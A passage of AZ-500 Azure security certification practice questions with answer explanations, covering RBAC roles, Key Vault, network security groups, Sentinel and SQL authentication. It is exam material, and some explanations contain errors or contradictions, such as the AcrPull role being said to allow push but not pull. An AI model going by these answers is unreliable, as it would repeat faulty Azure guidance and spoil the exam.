        You need to have read and write permissions to Azure Functions to configure a connector that uses an Azure Functions API connection. You were able to add other connectors, which proves that you have access to the workspace. Read permissions for the workspaces used by Microsoft Sentinel allow you to read data in Microsoft Sentinel. Read permissions to Azure Functions allows you to run functions, not create them.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-28","title":"Question 28","text":"

        You are configuring retention for Azure activity logs in Azure Monitor logs. The retention period for the Azure Monitor logs is set to 30 days. You need to meet the following compliance requirements:

        • Store the Azure activity logs for 90 days.
        • Encrypt the logs by using your own encryption keys.
        • Use the most cost-efficient storage solution for the logs.

        What should you do? Select only one answer.

        • Configure a workspace retention policy.
        • Configure diagnostic settings and send the logs to Azure Event Hubs Standard.
        • Configure diagnostic settings and send the logs to Azure Storage.
        • Leave the default settings as they are.
        See response

        Configuring diagnostic settings and sending the logs to Azure Storage meets both the retention time and encryption requirements. Activity log data type is kept for 90 days by default, but the logs are stored by using Microsoft-managed keys. Configuring a workspace retention policy is not the most cost-efficient solution for this. Event Hubs is a real-time event stream engine and is not designed to be used instead of a database or as a permanent store for indefinitely held event streams.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-29","title":"Question 29","text":"

        You need to implement a key management solution that supports importing keys generated in an on-premises environment. The solution must ensure that the keys stay within a single Azure region. What should you do? Select only one answer.

        • Apply the Keys should be the specified cryptographic type RSA or EC Azure policy.
        • Disable the Allow trusted services option.
        • Implement Azure Key Vault Firewall.
        • Implement Azure Key Vault Managed HSM.
        See response

        Key Vault Managed HSM supports importing keys generated in an on-premise HSM. Also, managed HSM does not store or process customer data outside the Azure region in which the customer deploys the HSM instance. On-premises-generated keys are still managed, after implementing Key Vault Firewall. Enforcing HSM-backed keys does not enforce them to be imported. Disabling the Allow trusted services option does not have a direct impact on key importing.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-30","title":"Question 30","text":"

        You have an Azure subscription that contains the following resources:

        • A virtual machine named VM1 that has a network interface named NIC1
        • A virtual network named VNet1 that has a subnet named Subnet1
        • A public IP address named PubIP1
        • A load balancer named LB1

        You create a network security group (NSG) named NSG1. To which two resources can you associate NSG1? Each correct answer presents a complete solution. Select all answers that apply.

        • LB1
        • NIC1
        • PubIP1
        • Subnet1
        • VM1
        • VNet1
        See response

        You can associate an NSG to a virtual network subnet and network interface only. You can associate zero or one NSGs to each virtual network subnet and network interface on a virtual machine. The same NSG can be associated to as many subnets and network interfaces as you choose.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-31","title":"Question 31","text":"

        You have an Azure subscription that contains the following resources:

        • An web app named WebApp1 in the West US Azure region
        • A virtual network named VNet1 in the West US 3 Azure region

        You need to integrate WebApp1 with VNet1. What should you implement first? Select only one answer.

        • a service endpoint
        • a VPN gateway
        • Azure Front door
        • peering
        See response

        WebApp1 and VNet1 are in different regions and cannot use regional integration; you can use only gateway-required virtual network integration. To be able to implement this type of integration, you must first deploy a virtual network gateway in VNet1.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-32","title":"Question 32","text":"

        You host a web app on an Azure virtual machine. Users access the app through a public load balancer. You need to offload SSL traffic to the web app at the edge. What should you do? Select only one answer.

        • Configure an Azure firewall and switch access to the app via an internal load balancer.
        • Configure Azure Application Gateway.
        • Configure Azure Front Door and switch access to the app via an internal load balancer.
        • Configure Azure Traffic Manager with performance traffic routing.
        See response

        Front Door allows for SSL offloading at the edge and can route traffic to an internal load balancer. Traffic Manager does not to perform SSL offloading. Neither Azure Firewall nor an Application Gateway can be deployed at the edge.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-33","title":"Question 33","text":"

        You have an Azure App Service web app named App1. You need to configure network controls for App1. App1 must only allow user access through Azure Front Door. Which two components should you implement? Each correct answer presents part of the solution. Select all answers that apply.

        • access restrictions based on service tag
        • access restrictions based on the IP address of Azure Front Door
        • application security groups
        • header filters
        See response

        Traffic from Front Door to the app originates from a well-known set of IP ranges defined in the\u00a0AzureFrontDoor.Backend\u00a0service tag. This includes every Front Door. To ensure traffic only originates from your specific instance, you will need to further filter the incoming requests based on the unique HTTP header that Front Door sends.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-34","title":"Question 34","text":"

        You have an Azure SQL database, an Azure key vault, and an Azure App Service web app. You plan to encrypt SQL data at rest by using Bring Your Own Key (BYOK). You need to create a managed identity to authenticate without storing any credentials in the code. The managed identity must share the lifecycle with the Azure resource it is used for. What should you implement?

        • a system-assigned managed identity for an Azure SQL logical server
        • a system-assigned managed identity for an Azure web app
        • a system-assigned managed identity for Azure Key Vault
        • a user-assigned managed identity
        See response

        So, to clarify, it's not about setting the managed identity at the Azure SQL logical server level. The managed identity is associated with the Azure web app, and it is used to access the encryption keys in the Azure Key Vault, enabling the SQL data at rest encryption without storing credentials in your code. The correct answer aligns with this approach.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-35","title":"Question 35","text":"

        You need to provide an administrator with the ability to manage custom RBAC roles. The solution must follow the principle of least privilege. Which role should you assign to the administrator?

        • Owner
        • Contributor
        • User Access Administrator
        • Privileged Role Administrator
        See response

        User Access Administrator is the least privileged role that grants access to\u00a0Microsoft.Authorization/roleDefinition/write. Assigning the Owner role does not follow the principle of least privilege. Contributor does not have access to\u00a0Microsoft.Authorization/roleDefinition/write. Privileged Role Administrator grants access to manage role assignments in Azure AD, and all aspects of Azure AD Privileged Identity Management (PIM). This is not an RBAC role.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-36","title":"Question 36","text":"

        You have a storage account that contains multiple containers, blobs, queues, and tables. You need to create a key to allow an application to access only data from a given table in the storage account. Which authentication method should you use for the application?

        • SAS
        • service SAS
        • User delegation
        • Shared Allow access
        See response

        A SAS service is the only type of authentication that provides control at the table level. User delegation SAS is only available for Blob storage. SAS and shared allow access to the entire storage account.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-37","title":"Question 37","text":"

        You have an Azure Storage account. You plan to prevent the use of shared keys by using Azure Policy. Which two access methods will continue to work? Each correct answer presents a complete solution.

        • Storage Blob Data Reader role
        • service SAS
        • user delegation
        • account SAS
        See response

        The Storage Blob Data Reader role uses Azure AD to authenticate. User delegation SAS is a method that uses Azure AD to generate a SAS. Both methods work whether the shared keys are allowed or prevented. Service SAS and account SAS use shared keys to generate.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-38","title":"Question 38","text":"

        You enable Always Encrypted for an Azure SQL database. Which scenario is supported?

        • encrypting existing data
        See response

        Encrypting existing data is supported. Always Encrypted uses the client driver to encrypt and decrypt data. This means that some actions that only occur on the server side will not work.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-39","title":"Question 39","text":"

        You are evaluating the Azure Policy configurations to identify any required custom initiatives and policies. You need to run workloads in Azure that are compliant with the following regulations:

        • FedRAMP High
        • PCI DSS 3.2.1
        • GDPR
        • ISO 27001:2013

        For which regulation should you create custom initiatives?

        • FedRAMP High
        • PCI DSS 3.2.1
        • GDPR
        • ISO 27001:2013
        See response

        To run workloads that are compliant with GDPR, custom initiatives should be to be created. GDPR compliance initiatives are not yet available in Azure. Azure has existing initiatives for ISO, PCI DSS 3.2.1, and FedRAMP High.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-40","title":"Question 40","text":"

        You have a workload in Azure that uses multiple virtual machines and Azure functions to access data in a storage account. You need to ensure that all access to the storage account is done by using a single identity. The solution must reduce the overhead of managing the identity. Which type of identity should you use? Select only one answer.

        • group
        • system-assigned managed identity
        • user
        • user-assigned managed identity
        See response

        A user assigned managed identity can be shared across Azure resources, and its password changes are handled by Azure. An user needs to manually handle password changes. You cannot use a group as a service principle. Multiple Azure resources cannot share system-assigned managed identities.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-41","title":"Question 41","text":"

        You have a workload in Azure that uses a virtual machine named VM1. VM1 is in a resource group named RG1. You need to create and assign an identity to VM1 that will be used to access Azure resources. Other virtual machines must be able to use the same identity. Which PowerShell script should you run? Select only one answer.

        • New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VM1\"
        • New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VMID\"
        • $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType SystemAssigned
        • $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType SystemAssignedUserAssigned
        See response

        New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VMID\"

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-42","title":"Question 42","text":"

        You have an Azure subscription that contains an Azure Kubernetes Service (AKS) cluster named AKS1 and a user named User1. You need to ensure that User1 has access to AKS1 secrets. The solution must follow the principle of least privilege. Which role should you assign to User1? Select only one answer.

        • Azure Kubernetes Service RBAC Admin
        • Azure Kubernetes Service RBAC Cluster Admin
        • Azure Kubernetes Service RBAC Reader
        • Azure Kubernetes Service RBAC Writer
        See response

        Azure Kubernetes Service RBAC Writer has access to secrets. Azure Kubernetes Service RBAC Reader does not have access to secrets. Azure Kubernetes Service RBAC Cluster Admin and Azure Kubernetes Service RBAC Admin do not follow the principle of least privilege.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-43","title":"Question 43","text":"

        You have an Azure subscription that contains an Azure container registry named CR1. You use Azure CLI to authenticate to the subscription. You need to authenticate to CR1 by using Azure CLI. Which command should you run? Select only one answer.

        • az acr config
        • az acr credential
        • az acr login
        • docker login
        See response

        The\u00a0az acr login\u00a0command is needed to authenticate to an Azure container registry from the Azure CLI. Docker login is used to sign in to a Docker repository.\u00a0az acr config\u00a0is used for configuring Azure Container Registry.\u00a0az acr credential\u00a0is used for managing login credentials for Azure Container Registry.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-44","title":"Question 44","text":"

        You have an Azure AD tenant that syncs with the on-premises Active Directory Domain Service (AD DS) domain and uses Azure Active Directory Domain Services (Azure AD DS). You have an application that runs on user devices by using the credentials of the signed-in user The application accesses data in Azure Files by using REST calls. You need to configure authentication for the application in Azure Files by using the most secure authentication method. Which authentication method should you use? Select only one answer.

        • Azure AD
        • SAS
        • shared key
        • on-premises Active Directory Domain Service (AD DS)
        See response

        A SAS is the most secure way to access Azure Files by using REST calls. A shared key allows any user with the key to access data. Azure AD and Active Directory Domain Service (AD DS) are unsupported for REST calls.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-45","title":"Question 45","text":"

        You have an Azure SQL Database server. You enable Azure AD authentication for Azure SQL. You need to prevent other authentication methods from being used. Which command should you run? Select only one answer.

        • az sql mi ad-admin create
        • az sql mi ad-only-auth enable
        • az sql server ad-admin create
        • az sql server ad-only-auth enable
        See response

        az sql server ad-only-auth enable

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-46","title":"Question 46","text":"

        **You are configuring an Azure Policy in your environment. You need to ensure that any resources that are missing a tag named CostCenter inherit a value from a resource group. You create a custom policy that uses the following snippet. **

        \"policyRule\": {\n    \"if\": {\n        \"field\": \"tags['CostCenter']\",\n        \"exists\": \"false\"\n    },\n    \"then\": {\n        \"effect\": \"modify\",\n        \"details\": {\n            \"roleDefinitionIds\": [\n                \"/providers/microsoft.authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c\"\n            ],\n            \"operations\": [{\n                \"operation\": \"addOrReplace \",\n                \"field\": \"tags['CostCenter']\",\n                \"value\": \"[resourcegroup().tags['CostCenter']]\"\n            }]\n        }\n    }\n}\n

        Which policy mode should you use? Select only one answer.

        • all
        • Append
        • DeployIfNotExists
        • indexed
        See response

        Indexed.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-47","title":"Question 47","text":"

        You set Periodic recurring scans to\u00a0ON\u00a0while implementing a Microsoft Defender for SQL vulnerability assessment. How often will the scan be triggered? Select only one answer.

        • at a recurrence that you configure
        • once a day
        • once a month
        • once a week
        See response

        Once a week.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-48","title":"Question 48","text":"

        You are implementing Microsoft Defender for SQL vulnerability assessments. In which two locations can users view the results? Each correct answer presents a complete solution. Select all answers that apply.

        • an Azure Blob storage account
        • an Azure Event Grid instance
        • Microsoft Defender for Cloud
        • Microsoft Teams
        See response

        Defender for Cloud is the default and mandatory location to view the results, while a Blob storage account is a mandatory destination and a prerequisite for enabling the scan. The Teams option is unavailable out of the box. A scan completion event is not sent to Event Grid.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-49","title":"Question 49","text":"

        You are collecting Azure activity logs to Azure Monitor. The retention period for Azure Monitor logs is set to 30 days. To meet compliance requirements, you need to send a copy of the Azure activity logs to your SOC partner. What should you do? Select only one answer.

        • Configure a workspace retention policy.
        • Configure diagnostic settings and send the logs to Azure Event Hubs.
        • Configure diagnostic settings and send the logs to Azure Storage.
        • Install the Microsoft Sentinel security information and event management (SIEM) connector.
        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-50","title":"Question 50","text":"

        You are designing an Azure solution that stores encrypted data in Azure Storage. You need to ensure that the keys used to encrypt the data cannot be permanently deleted until 60 days after they are deleted. The solution must minimize costs. What should you do? Select only one answer.

        • Store keys in an HSM-protected key vault that has soft delete and purge protection enabled.
        • Store keys in an HSM-protected key vault that has soft delete enabled.
        • Store keys in a software-protected key vault that has soft delete and purge protection enabled.
        • Store keys in a software-protected key vault that has soft delete enabled and purge protection disabled.
        See response

        Store keys in a software-protected key vault that has soft delete and purge protection enabled.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-51","title":"Question 51","text":"

        You plan to provide connectivity between Azure and your company\u2019s datacenter. You need to define how to establish the connection. The solution must meet the following requirements:

        • All traffic between the datacenter and Azure must be encrypted.
        • Bandwidth must be between 10 and 100 Gbps.

        What should you use for the connection? Select only one answer.

        • Azure VPN Gateway
        • ExpressRoute Direct
        • ExpressRoute with a provider
        • VPN Gateway with Azure Virtual WAN
        See response

        ExpressRoute Direct

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-52","title":"Question 52","text":"

        You are operating in a cloud-only environment. Users have computers that run either Windows 10 or 11. The users are located across the globe. You need to secure access to a point-to-site (P2S) VPN by using multi-factor authentication (MFA). Which authentication method should you implement? Select only one answer.

        • Authenticate by using Active Directory Domain Services (AD DS).
        • Authenticate by using native Azure AD authentication.
        • Authenticate by using native Azure certificate-based authentication.
        • Authenticate by using RADIUS.
        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-53","title":"Question 53","text":"

        You have an Azure subscription that contains the following resources:

        • Two virtual networks
          • VNet1: Contains two subnets
          • VNet2: Contains three subnets
        • Virtual machines: Connected to all the subnets on VNet1 and VNet2
        • A storage account named storage1

        You need to identify the minimal number of service endpoints that are required to meet the following requirements:

        • Virtual machines that are connected to the subnets of VNet1 must be able to access storage1 over the Azure backbone.
        • Virtual machines that are connected to the subnets of VNet2 must be able to access Azure AD over the Azure backbone.

        **How many service endpoints should you recommend? Select only one answer. **

        • 2
        • 3
        • 4
        • 5
        See response

        A service endpoint is configured for a specific server at the subnet level. Based on the requirements, you need to configure two service endpoints for\u00a0Microsoft.Storage\u00a0on VNet1 because VNet1 has two subnets and three service endpoints for\u00a0Microsoft.AzureActiveDirectory\u00a0on VNet2 because VNet2 has three subnets. The minimum number of service endpoints that you must configure is five.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-54","title":"Question 54","text":"

        You have an Azure subscription that contains a virtual network named VNet1. VNet1 contains the following subnets:

        • Subnet1: Has a connected virtual machine
        • Subnet2: Has a\u00a0Microsoft.Storage\u00a0service endpoint
        • Subnet3: Has subnet delegation to the\u00a0Microsoft.Web/serverFarms\u00a0service
        • Subnet: Has no additional configurations

        You need to deploy an Azure SQL managed instance named managed1 to VNet1. To which subnets can you connect managed1? Select only one answer.

        • Subnet4 only
        • Subnet3 and Subnet4 only
        • Subnet2 and Subnet4 only
        • Subnet2, Subnet3, and Subnet4 only
        • Subnet1, Subnet2, Subnet3, and Subnet4
        See response

        You can deploy an SQL managed instance to a dedicated virtual network subnet that does not have any resource connected. The subnet can have a service endpoint or can be delegated for a different service. For this scenario, you can deploy managed1 to Subnet2, Subnet3, and Subnet4 only. You cannot deploy managed1 to Subnet1 because Subnet1 has a connected virtual machine.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-55","title":"Question 55","text":"

        You use Azure Blueprints to deploy resources to a resource group named RG1. After the deployment, you try to add a disk to a virtual machine created by using Blueprints, but you get an access denied error. You open\u00a0RG1\u00a0and check your access. You notice that you are listed as part of the Virtual Machine Contributor role for RG1, and there are no deny assignments or classic administrators in the resource group scope. Why are you unable to manage the virtual machine? Select only one answer.

        • Blueprints created a deny assignment for the virtual machine resource.
        • Blueprints removed the user from the Classic Administrator role.
        • You must be part of the Disk Pool Operator role.
        • You must be part of the Virtual Machine Administrator Login role.
        See response

        Blueprints must have created a deny assignment at the resource level. The Disk Pool Operator role allows users to provide permissions to the StoragePool resource provider, and the Virtual Machine Administrator Login role allows users to view the virtual machine in the portal and sign in as an administrator. You still have the Contributor role and should be able to manage a virtual machine unless a deny assignment is in place.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-56","title":"Question 56","text":"

        You create an Azure policy by using the following snippet.

        \"then\": {\n    \"effect\": \"\",\n    \"details\": [{\n        \"field\": \"Microsoft.Storage/storageAccounts/networkAcls.ipRules\",\n        \"value\": [{\n            \"action\": \"Allow\",\n            \"value\": \"134.5.0.0/21\"\n        }]\n    }]\n}\n

        You need to ensure that the policy is applied whenever a new storage account is created or updated. There is no managed identity assigned to the policy initiative. Which effect should you use? Select only one answer.

        • Append
        • Audit
        • DeployIfNotExists
        • Modify
        See response

        Append\u00a0is used to add fields to existing properties.\u00a0Modify\u00a0is used to add, update, or remove properties, it does not ensure that a field has value.\u00a0DeployIfNotExists\u00a0is used to deploy resources.\u00a0Audit\u00a0is used to check for compliance.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-57","title":"Question 57","text":"

        You have an Azure subscription. You need to recommend a solution that uses crawling technology of Microsoft to discover and actively scan assets within an online infrastructure. The solution must also discover new connections over time. What should you include in the recommendation? Select only one answer.

        • a Microsoft Defender for Cloud custom initiative
        • Microsoft Defender External Attack Surface Management (EASM)
        • Microsoft Defender for Servers
        • the Microsoft cloud security benchmark (MCSB)
        See response

        Defender EASM applies the crawling technology of Microsoft to discover assets that are related to your known online infrastructure and actively scans these assets to discover new connections over time. Attack Surface Insights are generated by applying vulnerability and infrastructure data to showcase the key areas of concern for your organization.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-58","title":"Question 58","text":"

        You have an Azure subscription and the following SQL deployments:

        • An Azure SQL database named DB1
        • An Azure SQL Server named sqlserver1
        • An instance of SQL Server on Azure Virtual Machines named VM1 that has Microsoft SQL Server 2022 installed
        • An on-premises server named Server1 that has SQL Server 2019 installed

        Which deployments can be protected by using Microsoft Defender for Cloud? Select only one answer.

        • DB1 and sqlserver1 only
        • DB1, sqlserver1, and VM1 only
        • DB1, sqlserver1, VM1, and Server1
        • sqlserver1 only
        • sqlserver1 and VM1 only
        See response

        Defender for Cloud includes Microsoft Defender for SQL. Defender for SQL can protect Azure SQL Database, Azure SQL Server, SQL Server on Azure Virtual Machines, and SQL servers installed on on-premises servers.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-59","title":"Question 59","text":"

        You are designing a solution that must meet FIPS 140-2 Level 3 compliance in Azure. Where should the solution maintain encryption keys? Select only one answer.

        • a managed HSM
        • a software-protected Azure key vault
        • an Azure SQL Manage Instance database
        • an HSM-protected Azure key vault
        See response

        A managed HSM is level 3-compliant. An HSM-protected key vault is level 2-compliant. A software-protected key vault is level 1-complaint. SQL is not FIPS 104-2 level 3 compliant.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-60","title":"Question 60","text":"

        You have an Azure tenant that contains a user named User1 and an Azure key vault named Vault1. Vault1 is configured to use Azure role-based access control (RBAC). You need to ensure that User1 can perform actions on keys in Vault1 but cannot manage permissions. The solution must follow the principle of least privilege. Which role should you assign to User1? Select only one answer.

        • Key Vault Crypto Officer
        • Key Vault Crypto User
        • Key Vault Reader
        • Key Vault Secrets Officer
        • Key Vault Secrets User
        See response

        Correct: Key Vault Crypto Officer \u2013\u2013 This role meets the requirements. Incorrect: Key Vault Secrets Officer \u2013\u2013 This role is for secrets, not keys. Incorrect: Key Vault Reader \u2013\u2013 This role is only for read access, not performing actions. Incorrect: Key Vault Crypto User \u2013\u2013 This role can manage permissions. Incorrect: Key Vault Secrets User \u2013\u2013 This role is for secrets, not keys.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-61","title":"Question 61","text":"

        You are implementing an Azure Kubernetes Service (AKS) cluster for a production workload. You need to ensure that the cluster meets the following requirements:

        • Provides the highest networking performance possible
        • Manages ingress traffic by using Kubernetes tools

        What should you use? Select only one answer.

        • CNI networking with Azure load balancers
        • CNI networking with ingress resources and controllers
        • Kubenet networking with Azure load balancers
        • Kubenet networking with ingress resources and controllers
        See response

        CNI networking provides the best performance since it does not require IP forwarding and UDR, and ingress controllers can be managed from within Kuberbetes. Kubenet networking requires defined routes and IP forwarding, making the network slower. Azure load balancers cannot be managed by using Kubernetes tools.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-62","title":"Question 62","text":"

        You have an Azure subscription that contains a virtual machine named VM1. VM1 is configured with just-in-time (JIT) VM access. You need to request access to VM1. Which PowerShell cmdlet should you run? Select only one answer.

        • Add-AzNetworkSecurityRuleConfig
        • Get-AzJitNetworkAccessPolicy
        • Set-AzJitNetworkAccessPolicy
        • Start-AzJitNetworkAccessPolicy
        See response

        The\u00a0start-AzJitNetworkAccesspolicy\u00a0PowerShell cmdlet is used to request access to a JIT-enabled virtual machine.\u00a0Set-AzJitNetworkAccessPolicy\u00a0is used to enable JIT on a virtual machine.\u00a0Get-AzJitNetworkAccessPolicy\u00a0and\u00a0Add-AzNetworkSecurityRuleConfig\u00a0are not used to start a request access.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-63","title":"Question 63","text":"

        You create a role by using the following JSON.

        {\n  \"Name\": \"Virtual Machine Operator\",\n  \"Id\": \"88888888-8888-8888-8888-888888888888\",\n  \"IsCustom\": true,\n  \"Description\": \"Can monitor and restart virtual machines.\",\n  \"Actions\": [\n    \"Microsoft.Storage/*/read\",\n    \"Microsoft.Network/*/read\",\n    \"Microsoft.Compute/virtualMachines/start/action\",\n    \"Microsoft.Compute/virtualMachines/restart/action\",\n    \"Microsoft.Authorization/*/read\",\n    \"Microsoft.ResourceHealth/availabilityStatuses/read\",\n    \"Microsoft.Resources/subscriptions/resourceGroups/read\",\n    \"Microsoft.Insights/alertRules/*\",\n    \"Microsoft.Insights/diagnosticSettings/*\",\n    \"Microsoft.Support/*\"\n  ],\n  \"NotActions\": [],\n  \"DataActions\": [],\n  \"NotDataActions\": [],\n  \"AssignableScopes\": [\"/subscriptions/*\"]\n}\n

        A user that is part of the new role reports that they are unable to restart a virtual machine by using a PowerShell script. What should you do to ensure that the user can restart the virtual machine?

        • Add\u00a0Microsoft.Compute/virtualMachines/login/action\u00a0to the list of\u00a0DataActions\u00a0in the custom role.
        • Add\u00a0Microsoft.Compute/*/read\u00a0to the list of\u00a0Actions\u00a0in the role.
        See response

        The role needs read access to virtual machines to restart them. The user does not need to authenticate again for the role to be in effect, and the user will not be able to access the virtual machine from the portal. Adding\u00a0Microsoft.Compute/virtualMachines/login/action\u00a0to the list of\u00a0DataActions\u00a0in the role allows the user to sign in as a user, but not to restart the virtual machine.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-64","title":"Question 64","text":"

        You have a Linux virtual machine in an on-premises datacenter that is used as a forwarder for Microsoft Sentinel by using CEF-formatted logs. The timestamp on events retrieved from the forwarder is the time the agent on the forwarder received the event, not the time the event occurred on the system it came from. You need to ensure that Microsoft Sentinel receives the time the event was generated. What should you do? Select only one answer.

        • Run\u00a0cef_gather_info.py\u00a0on CEF forwarder.
        • Run\u00a0cef_gather_info.py\u00a0on each system that sends events to the forwarder.
        • Run\u00a0TimeGenerated.py\u00a0on each system that sends events to the forwarder.
        • Run\u00a0TimeGenerated.py\u00a0on the CEF forwarder.
        See response

        Running\u00a0TimeGenerated.py\u00a0on the CEF forwarder changes the logging on the forwarder to the use the event time instead of the time the event was received by the agent on the forwarder. Running\u00a0TimeGenerated.py\u00a0on each system will not change the way events are logged on the forwarder. Running\u00a0cef_gather_info.py\u00a0gathers data, but it does not change the timestamp.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-65","title":"Question 65","text":"

        You configure a Linux virtual machine to send Syslog data to Microsoft Sentinel. You notice that events for the virtual machine are duplicated in Microsoft Sentinel. You need to ensure that the events are not duplicated. Which two actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

        • Disable the synchronization of the Log Analytics agent with the Syslog configuration in Microsoft Sentinel.
        • Disable the Syslog daemon from listening to network messages.
        • Enable the Syslog daemon to listen to network messages.
        • Remove the entry used to send CEF messages from the Syslog configuration file for the virtual machine.
        • Stop the Syslog daemon on the virtual machine.
        See response

        You must disable CEF messages on the virtual machine and prevent the setting to send CEF messages from being read. Stopping the Syslog daemon on the virtual machine will stop the virtual machine from sending both Syslog and CEF messages. Enabling the Syslog daemon to listen and disabling the Syslog daemon from listening to network messages does not handle the duplication of events.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-66","title":"Question 66","text":"

        You are configuring automatic key rotation for an encryption key stored in Azure Key Vault. You need to implement an alert to be triggered five days before the keys are rotated. What should you use? Select only one answer.

        • an action group alert
        • Application Insights
        • Azure Event Grid
        • Microsoft Defender for Key Vault
        See response

        Using Event Grid triggers the\u00a0Microsoft.KeyVault.CertificateNearExpiry\u00a0event. Key Vault cannot be monitored by using Application Insights. Defender for Key Vault is used to alert for unusual and unplanned activities. Key Vault key expiration cannot be monitored by using action group alerts.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-67","title":"Question 67","text":"

        You have an Azure subscription that contains an Azure container registry named ACR1 and a user named User1. You need to ensure that User1 can administer images in ACR1. The solution must follow the principle of least privilege. Which two roles should you assign to User1? Each correct answer presents part of the solution. Select all answers that apply.

        • AcrDelete
        • AcrImageSigner
        • AcrPull
        • AcrPush
        • Contributor
        • Reader
        See response

        To administer images in ACR1, a user must be able to push and pull images to ACR1 and delete images from ACR1. The AcrPush and AcrDelete roles are required to push, pull, and delete images in ACR1. AcrPull only allows the Push image permission, not pull. Contributor can also perform these operations, however it also has many additional permissions, which means that it does not follow the principle of least privilege. Reader and AcrImageSigner do not have adequate permissions.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-68","title":"Question 68","text":"

        You need to allow only Azure AD-authenticated principals to access an existing Azure SQL database. Which three actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

        • Add an Azure AD administrator.
        • Assign your account the SQL Security Manager built-in role.
        • Connect to the database by using Microsoft SQL Server Management Studio (SSMS).
        • Connect to the database by using the Azure portal.
        • Select\u00a0Support only Azure Active Directory authentication for this server.
        See response

